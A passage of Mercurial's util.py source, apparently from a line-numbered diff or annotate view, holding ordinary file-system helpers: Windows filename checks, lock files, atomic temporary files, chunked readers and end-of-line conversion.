2044 2046 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 2047 "filename contains ':', which is reserved on Windows"
2046 2048 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 2049 "filename contains '\\x07', which is invalid on Windows"
2048 2050 >>> checkwinfilename(b"foo/bar/bla ")
2049 2051 "filename ends with ' ', which is not allowed on Windows"
2050 2052 >>> checkwinfilename(b"../bar")
2051 2053 >>> checkwinfilename(b"foo\\")
2052 2054 "filename ends with '\\', which is invalid on Windows"
2053 2055 >>> checkwinfilename(b"foo\\/bar")
2054 2056 "directory name ends with '\\', which is invalid on Windows"
2055 2057 """
2056 2058 if path.endswith(b'\\'):
2057 2059 return _(b"filename ends with '\\', which is invalid on Windows")
2058 2060 if b'\\/' in path:
2059 2061 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 2062 for n in path.replace(b'\\', b'/').split(b'/'):
2061 2063 if not n:
2062 2064 continue
2063 2065 for c in _filenamebytestr(n):
2064 2066 if c in _winreservedchars:
2065 2067 return (
2066 2068 _(
2067 2069 b"filename contains '%s', which is reserved "
2068 2070 b"on Windows"
2069 2071 )
2070 2072 % c
2071 2073 )
2072 2074 if ord(c) <= 31:
2073 2075 return _(
2074 2076 b"filename contains '%s', which is invalid on Windows"
2075 2077 ) % stringutil.escapestr(c)
2076 2078 base = n.split(b'.')[0]
2077 2079 if base and base.lower() in _winreservednames:
2078 2080 return (
2079 2081 _(b"filename contains '%s', which is reserved on Windows")
2080 2082 % base
2081 2083 )
2082 2084 t = n[-1:]
2083 2085 if t in b'. ' and n not in b'..':
2084 2086 return (
2085 2087 _(
2086 2088 b"filename ends with '%s', which is not allowed "
2087 2089 b"on Windows"
2088 2090 )
2089 2091 % t
2090 2092 )
2091 2093
2092 2094
2093 2095 timer = getattr(time, "perf_counter", None)
2094 2096
2095 2097 if pycompat.iswindows:
2096 2098 checkosfilename = checkwinfilename
2097 2099 if not timer:
2098 2100 timer = time.clock
2099 2101 else:
2100 2102 # mercurial.windows doesn't have platform.checkosfilename
2101 2103 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 2104 if not timer:
2103 2105 timer = time.time
2104 2106
2105 2107
2106 2108 def makelock(info, pathname):
2107 2109 """Create a lock file atomically if possible
2108 2110
2109 2111 This may leave a stale lock file if symlink isn't supported and signal
2110 2112 interrupt is enabled.
2111 2113 """
2112 2114 try:
2113 2115 return os.symlink(info, pathname)
2114 2116 except OSError as why:
2115 2117 if why.errno == errno.EEXIST:
2116 2118 raise
2117 2119 except AttributeError: # no symlink in os
2118 2120 pass
2119 2121
2120 2122 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 2123 ld = os.open(pathname, flags)
2122 2124 os.write(ld, info)
2123 2125 os.close(ld)
2124 2126
2125 2127
2126 2128 def readlock(pathname):
2127 2129 # type: (bytes) -> bytes
2128 2130 try:
2129 2131 return readlink(pathname)
2130 2132 except OSError as why:
2131 2133 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 2134 raise
2133 2135 except AttributeError: # no symlink in os
2134 2136 pass
2135 2137 with posixfile(pathname, b'rb') as fp:
2136 2138 return fp.read()
2137 2139
2138 2140
2139 2141 def fstat(fp):
2140 2142 '''stat file object that may not have fileno method.'''
2141 2143 try:
2142 2144 return os.fstat(fp.fileno())
2143 2145 except AttributeError:
2144 2146 return os.stat(fp.name)
2145 2147
2146 2148
2147 2149 # File system features
2148 2150
2149 2151
2150 2152 def fscasesensitive(path):
2151 2153 # type: (bytes) -> bool
2152 2154 """
2153 2155 Return true if the given path is on a case-sensitive filesystem
2154 2156
2155 2157 Requires a path (like /foo/.hg) ending with a foldable final
2156 2158 directory component.
2157 2159 """
2158 2160 s1 = os.lstat(path)
2159 2161 d, b = os.path.split(path)
2160 2162 b2 = b.upper()
2161 2163 if b == b2:
2162 2164 b2 = b.lower()
2163 2165 if b == b2:
2164 2166 return True # no evidence against case sensitivity
2165 2167 p2 = os.path.join(d, b2)
2166 2168 try:
2167 2169 s2 = os.lstat(p2)
2168 2170 if s2 == s1:
2169 2171 return False
2170 2172 return True
2171 2173 except OSError:
2172 2174 return True
2173 2175
2174 2176
2175 2177 try:
2176 2178 import re2 # pytype: disable=import-error
2177 2179
2178 2180 _re2 = None
2179 2181 except ImportError:
2180 2182 _re2 = False
2181 2183
2182 2184
2183 2185 class _re(object):
2184 2186 def _checkre2(self):
2185 2187 global _re2
2186 2188 try:
2187 2189 # check if match works, see issue3964
2188 2190 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2189 2191 except ImportError:
2190 2192 _re2 = False
2191 2193
2192 2194 def compile(self, pat, flags=0):
2193 2195 """Compile a regular expression, using re2 if possible
2194 2196
2195 2197 For best performance, use only re2-compatible regexp features. The
2196 2198 only flags from the re module that are re2-compatible are
2197 2199 IGNORECASE and MULTILINE."""
2198 2200 if _re2 is None:
2199 2201 self._checkre2()
2200 2202 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 2203 if flags & remod.IGNORECASE:
2202 2204 pat = b'(?i)' + pat
2203 2205 if flags & remod.MULTILINE:
2204 2206 pat = b'(?m)' + pat
2205 2207 try:
2206 2208 return re2.compile(pat)
2207 2209 except re2.error:
2208 2210 pass
2209 2211 return remod.compile(pat, flags)
2210 2212
2211 2213 @propertycache
2212 2214 def escape(self):
2213 2215 """Return the version of escape corresponding to self.compile.
2214 2216
2215 2217 This is imperfect because whether re2 or re is used for a particular
2216 2218 function depends on the flags, etc, but it's the best we can do.
2217 2219 """
2218 2220 global _re2
2219 2221 if _re2 is None:
2220 2222 self._checkre2()
2221 2223 if _re2:
2222 2224 return re2.escape
2223 2225 else:
2224 2226 return remod.escape
2225 2227
2226 2228
2227 2229 re = _re()
2228 2230
2229 2231 _fspathcache = {}
2230 2232
2231 2233
2232 2234 def fspath(name, root):
2233 2235 # type: (bytes, bytes) -> bytes
2234 2236 """Get name in the case stored in the filesystem
2235 2237
2236 2238 The name should be relative to root, and be normcase-ed for efficiency.
2237 2239
2238 2240 Note that this function is unnecessary, and should not be
2239 2241 called, for case-sensitive filesystems (simply because it's expensive).
2240 2242
2241 2243 The root should be normcase-ed, too.
2242 2244 """
2243 2245
2244 2246 def _makefspathcacheentry(dir):
2245 2247 return {normcase(n): n for n in os.listdir(dir)}
2246 2248
2247 2249 seps = pycompat.ossep
2248 2250 if pycompat.osaltsep:
2249 2251 seps = seps + pycompat.osaltsep
2250 2252 # Protect backslashes. This gets silly very quickly.
2251 2253 seps.replace(b'\\', b'\\\\')
2252 2254 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 2255 dir = os.path.normpath(root)
2254 2256 result = []
2255 2257 for part, sep in pattern.findall(name):
2256 2258 if sep:
2257 2259 result.append(sep)
2258 2260 continue
2259 2261
2260 2262 if dir not in _fspathcache:
2261 2263 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 2264 contents = _fspathcache[dir]
2263 2265
2264 2266 found = contents.get(part)
2265 2267 if not found:
2266 2268 # retry "once per directory" per "dirstate.walk" which
2267 2269 # may take place for each patches of "hg qpush", for example
2268 2270 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 2271 found = contents.get(part)
2270 2272
2271 2273 result.append(found or part)
2272 2274 dir = os.path.join(dir, part)
2273 2275
2274 2276 return b''.join(result)
2275 2277
2276 2278
2277 2279 def checknlink(testfile):
2278 2280 # type: (bytes) -> bool
2279 2281 '''check whether hardlink count reporting works properly'''
2280 2282
2281 2283 # testfile may be open, so we need a separate file for checking to
2282 2284 # work around issue2543 (or testfile may get lost on Samba shares)
2283 2285 f1, f2, fp = None, None, None
2284 2286 try:
2285 2287 fd, f1 = pycompat.mkstemp(
2286 2288 prefix=b'.%s-' % os.path.basename(testfile),
2287 2289 suffix=b'1~',
2288 2290 dir=os.path.dirname(testfile),
2289 2291 )
2290 2292 os.close(fd)
2291 2293 f2 = b'%s2~' % f1[:-2]
2292 2294
2293 2295 oslink(f1, f2)
2294 2296 # nlinks() may behave differently for files on Windows shares if
2295 2297 # the file is open.
2296 2298 fp = posixfile(f2)
2297 2299 return nlinks(f2) > 1
2298 2300 except OSError:
2299 2301 return False
2300 2302 finally:
2301 2303 if fp is not None:
2302 2304 fp.close()
2303 2305 for f in (f1, f2):
2304 2306 try:
2305 2307 if f is not None:
2306 2308 os.unlink(f)
2307 2309 except OSError:
2308 2310 pass
2309 2311
2310 2312
2311 2313 def endswithsep(path):
2312 2314 # type: (bytes) -> bool
2313 2315 '''Check path ends with os.sep or os.altsep.'''
2314 2316 return bool( # help pytype
2315 2317 path.endswith(pycompat.ossep)
2316 2318 or pycompat.osaltsep
2317 2319 and path.endswith(pycompat.osaltsep)
2318 2320 )
2319 2321
2320 2322
2321 2323 def splitpath(path):
2322 2324 # type: (bytes) -> List[bytes]
2323 2325 """Split path by os.sep.
2324 2326 Note that this function does not use os.altsep because this is
2325 2327 an alternative of simple "xxx.split(os.sep)".
2326 2328 It is recommended to use os.path.normpath() before using this
2327 2329 function if need."""
2328 2330 return path.split(pycompat.ossep)
2329 2331
2330 2332
2331 2333 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 2334 """Create a temporary file with the same contents from name
2333 2335
2334 2336 The permission bits are copied from the original file.
2335 2337
2336 2338 If the temporary file is going to be truncated immediately, you
2337 2339 can use emptyok=True as an optimization.
2338 2340
2339 2341 Returns the name of the temporary file.
2340 2342 """
2341 2343 d, fn = os.path.split(name)
2342 2344 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 2345 os.close(fd)
2344 2346 # Temporary files are created with mode 0600, which is usually not
2345 2347 # what we want. If the original file already exists, just copy
2346 2348 # its mode. Otherwise, manually obey umask.
2347 2349 copymode(name, temp, createmode, enforcewritable)
2348 2350
2349 2351 if emptyok:
2350 2352 return temp
2351 2353 try:
2352 2354 try:
2353 2355 ifp = posixfile(name, b"rb")
2354 2356 except IOError as inst:
2355 2357 if inst.errno == errno.ENOENT:
2356 2358 return temp
2357 2359 if not getattr(inst, 'filename', None):
2358 2360 inst.filename = name
2359 2361 raise
2360 2362 ofp = posixfile(temp, b"wb")
2361 2363 for chunk in filechunkiter(ifp):
2362 2364 ofp.write(chunk)
2363 2365 ifp.close()
2364 2366 ofp.close()
2365 2367 except: # re-raises
2366 2368 try:
2367 2369 os.unlink(temp)
2368 2370 except OSError:
2369 2371 pass
2370 2372 raise
2371 2373 return temp
2372 2374
2373 2375
2374 2376 class filestat(object):
2375 2377 """help to exactly detect change of a file
2376 2378
2377 2379 'stat' attribute is result of 'os.stat()' if specified 'path'
2378 2380 exists. Otherwise, it is None. This can avoid preparative
2379 2381 'exists()' examination on client side of this class.
2380 2382 """
2381 2383
2382 2384 def __init__(self, stat):
2383 2385 self.stat = stat
2384 2386
2385 2387 @classmethod
2386 2388 def frompath(cls, path):
2387 2389 try:
2388 2390 stat = os.stat(path)
2389 2391 except OSError as err:
2390 2392 if err.errno != errno.ENOENT:
2391 2393 raise
2392 2394 stat = None
2393 2395 return cls(stat)
2394 2396
2395 2397 @classmethod
2396 2398 def fromfp(cls, fp):
2397 2399 stat = os.fstat(fp.fileno())
2398 2400 return cls(stat)
2399 2401
2400 2402 __hash__ = object.__hash__
2401 2403
2402 2404 def __eq__(self, old):
2403 2405 try:
2404 2406 # if ambiguity between stat of new and old file is
2405 2407 # avoided, comparison of size, ctime and mtime is enough
2406 2408 # to exactly detect change of a file regardless of platform
2407 2409 return (
2408 2410 self.stat.st_size == old.stat.st_size
2409 2411 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 2412 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 2413 )
2412 2414 except AttributeError:
2413 2415 pass
2414 2416 try:
2415 2417 return self.stat is None and old.stat is None
2416 2418 except AttributeError:
2417 2419 return False
2418 2420
2419 2421 def isambig(self, old):
2420 2422 """Examine whether new (= self) stat is ambiguous against old one
2421 2423
2422 2424 "S[N]" below means stat of a file at N-th change:
2423 2425
2424 2426 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 2427 - S[n-1].ctime == S[n].ctime
2426 2428 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 2429 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2428 2430 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 2431 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430 2432
2431 2433 Case (*2) above means that a file was changed twice or more at
2432 2434 same time in sec (= S[n-1].ctime), and comparison of timestamp
2433 2435 is ambiguous.
2434 2436
2435 2437 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2436 2438 timestamp is ambiguous".
2437 2439
2438 2440 But advancing mtime only in case (*2) doesn't work as
2439 2441 expected, because naturally advanced S[n].mtime in case (*1)
2440 2442 might be equal to manually advanced S[n-1 or earlier].mtime.
2441 2443
2442 2444 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 2445 treated as ambiguous regardless of mtime, to avoid overlooking
2444 2446 by confliction between such mtime.
2445 2447
2446 2448 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 2449 S[n].mtime", even if size of a file isn't changed.
2448 2450 """
2449 2451 try:
2450 2452 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 2453 except AttributeError:
2452 2454 return False
2453 2455
2454 2456 def avoidambig(self, path, old):
2455 2457 """Change file stat of specified path to avoid ambiguity
2456 2458
2457 2459 'old' should be previous filestat of 'path'.
2458 2460
2459 2461 This skips avoiding ambiguity, if a process doesn't have
2460 2462 appropriate privileges for 'path'. This returns False in this
2461 2463 case.
2462 2464
2463 2465 Otherwise, this returns True, as "ambiguity is avoided".
2464 2466 """
2465 2467 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 2468 try:
2467 2469 os.utime(path, (advanced, advanced))
2468 2470 except OSError as inst:
2469 2471 if inst.errno == errno.EPERM:
2470 2472 # utime() on the file created by another user causes EPERM,
2471 2473 # if a process doesn't have appropriate privileges
2472 2474 return False
2473 2475 raise
2474 2476 return True
2475 2477
2476 2478 def __ne__(self, other):
2477 2479 return not self == other
2478 2480
2479 2481
2480 2482 class atomictempfile(object):
2481 2483 """writable file object that atomically updates a file
2482 2484
2483 2485 All writes will go to a temporary copy of the original file. Call
2484 2486 close() when you are done writing, and atomictempfile will rename
2485 2487 the temporary copy to the original name, making the changes
2486 2488 visible. If the object is destroyed without being closed, all your
2487 2489 writes are discarded.
2488 2490
2489 2491 checkambig argument of constructor is used with filestat, and is
2490 2492 useful only if target file is guarded by any lock (e.g. repo.lock
2491 2493 or repo.wlock).
2492 2494 """
2493 2495
2494 2496 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 2497 self.__name = name # permanent name
2496 2498 self._tempname = mktempcopy(
2497 2499 name,
2498 2500 emptyok=(b'w' in mode),
2499 2501 createmode=createmode,
2500 2502 enforcewritable=(b'w' in mode),
2501 2503 )
2502 2504
2503 2505 self._fp = posixfile(self._tempname, mode)
2504 2506 self._checkambig = checkambig
2505 2507
2506 2508 # delegated methods
2507 2509 self.read = self._fp.read
2508 2510 self.write = self._fp.write
2509 2511 self.seek = self._fp.seek
2510 2512 self.tell = self._fp.tell
2511 2513 self.fileno = self._fp.fileno
2512 2514
2513 2515 def close(self):
2514 2516 if not self._fp.closed:
2515 2517 self._fp.close()
2516 2518 filename = localpath(self.__name)
2517 2519 oldstat = self._checkambig and filestat.frompath(filename)
2518 2520 if oldstat and oldstat.stat:
2519 2521 rename(self._tempname, filename)
2520 2522 newstat = filestat.frompath(filename)
2521 2523 if newstat.isambig(oldstat):
2522 2524 # stat of changed file is ambiguous to original one
2523 2525 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 2526 os.utime(filename, (advanced, advanced))
2525 2527 else:
2526 2528 rename(self._tempname, filename)
2527 2529
2528 2530 def discard(self):
2529 2531 if not self._fp.closed:
2530 2532 try:
2531 2533 os.unlink(self._tempname)
2532 2534 except OSError:
2533 2535 pass
2534 2536 self._fp.close()
2535 2537
2536 2538 def __del__(self):
2537 2539 if safehasattr(self, '_fp'): # constructor actually did something
2538 2540 self.discard()
2539 2541
2540 2542 def __enter__(self):
2541 2543 return self
2542 2544
2543 2545 def __exit__(self, exctype, excvalue, traceback):
2544 2546 if exctype is not None:
2545 2547 self.discard()
2546 2548 else:
2547 2549 self.close()
2548 2550
2549 2551
2550 2552 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 2553 # type: (bytes, bool, bool) -> None
2552 2554 """unlink and remove the directory if it is empty"""
2553 2555 if ignoremissing:
2554 2556 tryunlink(f)
2555 2557 else:
2556 2558 unlink(f)
2557 2559 if rmdir:
2558 2560 # try removing directories that might now be empty
2559 2561 try:
2560 2562 removedirs(os.path.dirname(f))
2561 2563 except OSError:
2562 2564 pass
2563 2565
2564 2566
2565 2567 def tryunlink(f):
2566 2568 # type: (bytes) -> None
2567 2569 """Attempt to remove a file, ignoring ENOENT errors."""
2568 2570 try:
2569 2571 unlink(f)
2570 2572 except OSError as e:
2571 2573 if e.errno != errno.ENOENT:
2572 2574 raise
2573 2575
2574 2576
2575 2577 def makedirs(name, mode=None, notindexed=False):
2576 2578 # type: (bytes, Optional[int], bool) -> None
2577 2579 """recursive directory creation with parent mode inheritance
2578 2580
2579 2581 Newly created directories are marked as "not to be indexed by
2580 2582 the content indexing service", if ``notindexed`` is specified
2581 2583 for "write" mode access.
2582 2584 """
2583 2585 try:
2584 2586 makedir(name, notindexed)
2585 2587 except OSError as err:
2586 2588 if err.errno == errno.EEXIST:
2587 2589 return
2588 2590 if err.errno != errno.ENOENT or not name:
2589 2591 raise
2590 2592 parent = os.path.dirname(os.path.abspath(name))
2591 2593 if parent == name:
2592 2594 raise
2593 2595 makedirs(parent, mode, notindexed)
2594 2596 try:
2595 2597 makedir(name, notindexed)
2596 2598 except OSError as err:
2597 2599 # Catch EEXIST to handle races
2598 2600 if err.errno == errno.EEXIST:
2599 2601 return
2600 2602 raise
2601 2603 if mode is not None:
2602 2604 os.chmod(name, mode)
2603 2605
2604 2606
2605 2607 def readfile(path):
2606 2608 # type: (bytes) -> bytes
2607 2609 with open(path, b'rb') as fp:
2608 2610 return fp.read()
2609 2611
2610 2612
2611 2613 def writefile(path, text):
2612 2614 # type: (bytes, bytes) -> None
2613 2615 with open(path, b'wb') as fp:
2614 2616 fp.write(text)
2615 2617
2616 2618
2617 2619 def appendfile(path, text):
2618 2620 # type: (bytes, bytes) -> None
2619 2621 with open(path, b'ab') as fp:
2620 2622 fp.write(text)
2621 2623
2622 2624
2623 2625 class chunkbuffer(object):
2624 2626 """Allow arbitrary sized chunks of data to be efficiently read from an
2625 2627 iterator over chunks of arbitrary size."""
2626 2628
2627 2629 def __init__(self, in_iter):
2628 2630 """in_iter is the iterator that's iterating over the input chunks."""
2629 2631
2630 2632 def splitbig(chunks):
2631 2633 for chunk in chunks:
2632 2634 if len(chunk) > 2 ** 20:
2633 2635 pos = 0
2634 2636 while pos < len(chunk):
2635 2637 end = pos + 2 ** 18
2636 2638 yield chunk[pos:end]
2637 2639 pos = end
2638 2640 else:
2639 2641 yield chunk
2640 2642
2641 2643 self.iter = splitbig(in_iter)
2642 2644 self._queue = collections.deque()
2643 2645 self._chunkoffset = 0
2644 2646
2645 2647 def read(self, l=None):
2646 2648 """Read L bytes of data from the iterator of chunks of data.
2647 2649 Returns less than L bytes if the iterator runs dry.
2648 2650
2649 2651 If size parameter is omitted, read everything"""
2650 2652 if l is None:
2651 2653 return b''.join(self.iter)
2652 2654
2653 2655 left = l
2654 2656 buf = []
2655 2657 queue = self._queue
2656 2658 while left > 0:
2657 2659 # refill the queue
2658 2660 if not queue:
2659 2661 target = 2 ** 18
2660 2662 for chunk in self.iter:
2661 2663 queue.append(chunk)
2662 2664 target -= len(chunk)
2663 2665 if target <= 0:
2664 2666 break
2665 2667 if not queue:
2666 2668 break
2667 2669
2668 2670 # The easy way to do this would be to queue.popleft(), modify the
2669 2671 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 2672 # where we read partial chunk content, this incurs 2 dequeue
2671 2673 # mutations and creates a new str for the remaining chunk in the
2672 2674 # queue. Our code below avoids this overhead.
2673 2675
2674 2676 chunk = queue[0]
2675 2677 chunkl = len(chunk)
2676 2678 offset = self._chunkoffset
2677 2679
2678 2680 # Use full chunk.
2679 2681 if offset == 0 and left >= chunkl:
2680 2682 left -= chunkl
2681 2683 queue.popleft()
2682 2684 buf.append(chunk)
2683 2685 # self._chunkoffset remains at 0.
2684 2686 continue
2685 2687
2686 2688 chunkremaining = chunkl - offset
2687 2689
2688 2690 # Use all of unconsumed part of chunk.
2689 2691 if left >= chunkremaining:
2690 2692 left -= chunkremaining
2691 2693 queue.popleft()
2692 2694 # offset == 0 is enabled by block above, so this won't merely
2693 2695 # copy via ``chunk[0:]``.
2694 2696 buf.append(chunk[offset:])
2695 2697 self._chunkoffset = 0
2696 2698
2697 2699 # Partial chunk needed.
2698 2700 else:
2699 2701 buf.append(chunk[offset : offset + left])
2700 2702 self._chunkoffset += left
2701 2703 left -= chunkremaining
2702 2704
2703 2705 return b''.join(buf)
2704 2706
2705 2707
2706 2708 def filechunkiter(f, size=131072, limit=None):
2707 2709 """Create a generator that produces the data in the file size
2708 2710 (default 131072) bytes at a time, up to optional limit (default is
2709 2711 to read all data). Chunks may be less than size bytes if the
2710 2712 chunk is the last chunk in the file, or the file is a socket or
2711 2713 some other type of file that sometimes reads less data than is
2712 2714 requested."""
2713 2715 assert size >= 0
2714 2716 assert limit is None or limit >= 0
2715 2717 while True:
2716 2718 if limit is None:
2717 2719 nbytes = size
2718 2720 else:
2719 2721 nbytes = min(limit, size)
2720 2722 s = nbytes and f.read(nbytes)
2721 2723 if not s:
2722 2724 break
2723 2725 if limit:
2724 2726 limit -= len(s)
2725 2727 yield s
2726 2728
2727 2729
2728 2730 class cappedreader(object):
2729 2731 """A file object proxy that allows reading up to N bytes.
2730 2732
2731 2733 Given a source file object, instances of this type allow reading up to
2732 2734 N bytes from that source file object. Attempts to read past the allowed
2733 2735 limit are treated as EOF.
2734 2736
2735 2737 It is assumed that I/O is not performed on the original file object
2736 2738 in addition to I/O that is performed by this instance. If there is,
2737 2739 state tracking will get out of sync and unexpected results will ensue.
2738 2740 """
2739 2741
2740 2742 def __init__(self, fh, limit):
2741 2743 """Allow reading up to <limit> bytes from <fh>."""
2742 2744 self._fh = fh
2743 2745 self._left = limit
2744 2746
2745 2747 def read(self, n=-1):
2746 2748 if not self._left:
2747 2749 return b''
2748 2750
2749 2751 if n < 0:
2750 2752 n = self._left
2751 2753
2752 2754 data = self._fh.read(min(n, self._left))
2753 2755 self._left -= len(data)
2754 2756 assert self._left >= 0
2755 2757
2756 2758 return data
2757 2759
2758 2760 def readinto(self, b):
2759 2761 res = self.read(len(b))
2760 2762 if res is None:
2761 2763 return None
2762 2764
2763 2765 b[0 : len(res)] = res
2764 2766 return len(res)
2765 2767
2766 2768
2767 2769 def unitcountfn(*unittable):
2768 2770 '''return a function that renders a readable count of some quantity'''
2769 2771
2770 2772 def go(count):
2771 2773 for multiplier, divisor, format in unittable:
2772 2774 if abs(count) >= divisor * multiplier:
2773 2775 return format % (count / float(divisor))
2774 2776 return unittable[-1][2] % count
2775 2777
2776 2778 return go
2777 2779
2778 2780
2779 2781 def processlinerange(fromline, toline):
2780 2782 # type: (int, int) -> Tuple[int, int]
2781 2783 """Check that linerange <fromline>:<toline> makes sense and return a
2782 2784 0-based range.
2783 2785
2784 2786 >>> processlinerange(10, 20)
2785 2787 (9, 20)
2786 2788 >>> processlinerange(2, 1)
2787 2789 Traceback (most recent call last):
2788 2790 ...
2789 2791 ParseError: line range must be positive
2790 2792 >>> processlinerange(0, 5)
2791 2793 Traceback (most recent call last):
2792 2794 ...
2793 2795 ParseError: fromline must be strictly positive
2794 2796 """
2795 2797 if toline - fromline < 0:
2796 2798 raise error.ParseError(_(b"line range must be positive"))
2797 2799 if fromline < 1:
2798 2800 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 2801 return fromline - 1, toline
2800 2802
2801 2803
2802 2804 bytecount = unitcountfn(
2803 2805 (100, 1 << 30, _(b'%.0f GB')),
2804 2806 (10, 1 << 30, _(b'%.1f GB')),
2805 2807 (1, 1 << 30, _(b'%.2f GB')),
2806 2808 (100, 1 << 20, _(b'%.0f MB')),
2807 2809 (10, 1 << 20, _(b'%.1f MB')),
2808 2810 (1, 1 << 20, _(b'%.2f MB')),
2809 2811 (100, 1 << 10, _(b'%.0f KB')),
2810 2812 (10, 1 << 10, _(b'%.1f KB')),
2811 2813 (1, 1 << 10, _(b'%.2f KB')),
2812 2814 (1, 1, _(b'%.0f bytes')),
2813 2815 )
2814 2816
2815 2817
2816 2818 class transformingwriter(object):
2817 2819 """Writable file wrapper to transform data by function"""
2818 2820
2819 2821 def __init__(self, fp, encode):
2820 2822 self._fp = fp
2821 2823 self._encode = encode
2822 2824
2823 2825 def close(self):
2824 2826 self._fp.close()
2825 2827
2826 2828 def flush(self):
2827 2829 self._fp.flush()
2828 2830
2829 2831 def write(self, data):
2830 2832 return self._fp.write(self._encode(data))
2831 2833
2832 2834
2833 2835 # Matches a single EOL which can either be a CRLF where repeated CR
2834 2836 # are removed or a LF. We do not care about old Macintosh files, so a
2835 2837 # stray CR is an error.
2836 2838 _eolre = remod.compile(br'\r*\n')
2837 2839
2838 2840
2839 2841 def tolf(s):
2840 2842 # type: (bytes) -> bytes
2841 2843 return _eolre.sub(b'\n', s)
2842 2844
2843 2845
2844 2846 def tocrlf(s):
2845 2847 # type: (bytes) -> bytes
2846 2848 return _eolre.sub(b'\r\n', s)
2847 2849
2848 2850
2849 2851 def _crlfwriter(fp):
2850 2852 return transformingwriter(fp, tocrlf)
2851 2853
2852 2854
2853 2855 if pycompat.oslinesep == b'\r\n':
2854 2856 tonativeeol = tocrlf
2855 2857 fromnativeeol = tolf
2856 2858 nativeeolwriter = _crlfwriter
2857 2859 else:
2858 2860 tonativeeol = pycompat.identity
2859 2861 fromnativeeol = pycompat.identity
2860 2862 nativeeolwriter = pycompat.identity
2861 2863
2862 2864 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 2865 3,
2864 2866 0,
2865 2867 ):
2866 2868 # There is an issue in CPython that some IO methods do not handle EINTR
2867 2869 # correctly. The following table shows what CPython version (and functions)
2868 2870 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 2871 #
2870 2872 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 2873 # --------------------------------------------------
2872 2874 # fp.__iter__ | buggy | buggy | okay
2873 2875 # fp.read* | buggy | okay [1] | okay
2874 2876 #
2875 2877 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 2878 #
2877 2879 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2878 2880 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 2881 #
2880 2882 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2881 2883 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 2884 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 2885 # fp.__iter__ but not other fp.read* methods.
2884 2886 #
2885 2887 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 2888 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 2889 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 2890 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 2891 # to minimize the performance impact.
2890 2892
2891 2893 def iterfile(fp):
2892 2894 fastpath = True
2893 2895 if type(fp) is file:
2894 2896 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 2897 if fastpath:
2896 2898 return fp
2897 2899 else:
2898 2900 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 2901 return iter(fp.readline, b'')
2900 2902
2901 2903
2902 2904 else:
2903 2905 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 2906 def iterfile(fp):
2905 2907 return fp
2906 2908
2907 2909
2908 2910 def iterlines(iterator):
2909 2911 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 2912 for chunk in iterator:
2911 2913 for line in chunk.splitlines():
2912 2914 yield line
2913 2915
2914 2916
2915 2917 def expandpath(path):
2916 2918 # type: (bytes) -> bytes
2917 2919 return os.path.expanduser(os.path.expandvars(path))
2918 2920
2919 2921
2920 2922 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 2923 """Return the result of interpolating items in the mapping into string s.
2922 2924
2923 2925 prefix is a single character string, or a two character string with
2924 2926 a backslash as the first character if the prefix needs to be escaped in
2925 2927 a regular expression.
2926 2928
2927 2929 fn is an optional function that will be applied to the replacement text
2928 2930 just before replacement.
2929 2931
2930 2932 escape_prefix is an optional flag that allows using doubled prefix for
2931 2933 its escaping.
2932 2934 """
2933 2935 fn = fn or (lambda s: s)
2934 2936 patterns = b'|'.join(mapping.keys())
2935 2937 if escape_prefix:
2936 2938 patterns += b'|' + prefix
2937 2939 if len(prefix) > 1:
2938 2940 prefix_char = prefix[1:]
2939 2941 else:
2940 2942 prefix_char = prefix
2941 2943 mapping[prefix_char] = prefix_char
2942 2944 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 2945 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944 2946
2945 2947
2946 2948 def getport(port):
2947 2949 # type: (Union[bytes, int]) -> int
2948 2950 """Return the port for a given network service.
